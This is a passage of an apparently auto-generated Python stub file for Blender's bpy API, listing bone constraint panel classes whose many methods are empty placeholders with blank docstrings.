def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bPythonConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bRotLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bRotateLikeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSameVolumeConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bShrinkwrapConstraint(ConstraintButtonsPanel,
BoneConstraintPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSizeLikeConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSizeLimitConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bSplineIKConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bStretchToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class BONE_PT_bTrackToConstraint(ConstraintButtonsPanel, BoneConstraintPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
